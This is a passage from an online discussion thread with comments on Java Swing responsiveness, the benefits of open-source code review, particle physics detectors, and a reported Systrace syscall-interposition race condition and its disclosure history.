      If I find that I can run things like utorrent, kdevelop (with all those kde libs) and anti-virus software without noticing these issues versus the java applications alone, with the anti-virus software disabled... I still notice all the redrawing, latency in my clicks. That in my opinion is not good enough.

      And by the way, I do most of my work in a 100% Java GUI (Swing) app, which is NetBeans, a large, complicated, powerful IDE, on a regular PC, and it is just as responsive as any other desktop app,

      Can't say the experience has been the same for me. I've messed with Java since 1.1 to 6, I've used various jdks, messed with native java compilers (including those that convert java source to .net bytecode). The alternatives to Sun JDK are always too far behind to run the best/popular java applications I've come across... Freenet, Azureus, Netbeans (although notably, netbeans doesn't run too bad on Sun JVM -- I just notice the UI redrawing).

      and it uses less memory. It runs in less than 100mb, all the time.

      Memory arguments are somewhat pointless, I could write software to compress data in memory to keep the memory usage smaller, but the side effect is that the application could behave much slower due to this. While unnecessary things shouldn't be in memory, responsiveness on consumer hardware from the interface is far more important.

      Too often I see other Java developers, who tell users that their applications are not slow and there is nothing wrong with them, they get these results on their beefed up machine (quite normal for a developer, but bad for testing certain cases if your end users are common people who have 256MB ram, windows xp, crappy intensive anti-virus and who knows what else).

      Even now, I look at one of my little side projects under the latest Sun jvm6, versus Sun jvm1.4... I can see clearly there is a lower framerate with i

      --
      Change is certain; progress is not obligatory.
  51. Re:The beauty of open source by mrsteveman1 · · Score: 1

    That only works up to the exact number of users who are both able to read code, and understand it, which is a smaller number than the total user count probably by quite a bit.

    The advantage is that users are ABLE to find things like security problems if they look, because the source is open. That doesn't guarantee they will find things, but you can see that it is at least possible.

  52. Re:The beauty of open source by larry+bagina · · Score: 1

    Speaking only for myself, access to source code has let me identify new vulnerabilities a lot faster than black box testing. Easier discovering? Yes. But that doesn't mean the bugs will be reported (I gave up -- too many arrogant programmers that aren't as smart as they think they are), the code fixed, or the users updated.

    --
    Do you even lift?

    These aren't the 'roids you're looking for.

  53. Re:Why??? by Sibelius · · Score: 1

    Well, to be entirely honest, because it's the only way we know how. If we knew a better, cheaper, or faster way, we'd use that, I'm sure. That's not to say that I don't think there is something cool about building the next generation of bigger and more complex detectors, but the conventional wisdom is that after CMS and ATLAS, no one would fund another generation of even bigger accelerator rings and accompanying detectors, so if particle physics has anything left to figure out, they'll have to try one of the newer techniques (wakefield accelerators? ::shrug::).

  54. Re:Why??? by ettlz · · Score: 1

    Or CLIC or ILC etc. Well, I ain't complainin', it's a great way to spend government money. And the way I see it, not only does it keep us all in jobs, it's more money that the Illuminati will never be able to use to further immanentise the eschaton.

  55. Systrace.org post on this alleged bug by widman · · Score: 2, Informative
    http://www.systrace.org/index.php?/archives/14-Evading-System-Sandbox-Containment.html

    At WOOT this year, Robert Watson presented a paper on how to evade popular system call interposition systems, including Systrace. For Systrace, Robert noticed that the arguments written to the stackgap could be replaced by a co-operating process after Systrace performed its policy check. The initial prototype of Systrace as described in the paper avoided this problem by using a look-aside buffer in the kernel. This imposes a slight performance penalty but I hope that this obvious solution is going to be included in the OpenBSD and NetBSD kernel soon.
    Also check the comment by the "Cambridge Researcher", kind of acknowledging it's nothing new.
    1. Re:Systrace.org post on this alleged bug by Anonymous Coward · · Score: 0

      Robert Watson has stated in his blog that he notified Niels and Theo of this vulnerability in 2002, prior to it even being committed to OpenBSD. And that the comment in the OpenBSD man page was a result of that report. That means Theo knew about this for five years and didn't fix it or remove Systrace!

  56. No it isn't. by Anonymous Coward · · Score: 0

    It's not a whopper of a hole. Systrace isn't used by anything by default, it's a tool you have to configure specifically on a per app basis for that app. And this "vulnerability" has been documented in the systrace man page for years. Systrace isn't supposed to be used for a false sense of security, it's supposed to be used for things like stopping poorly written configure/make messes from writing things to places they shouldn't while working on ports.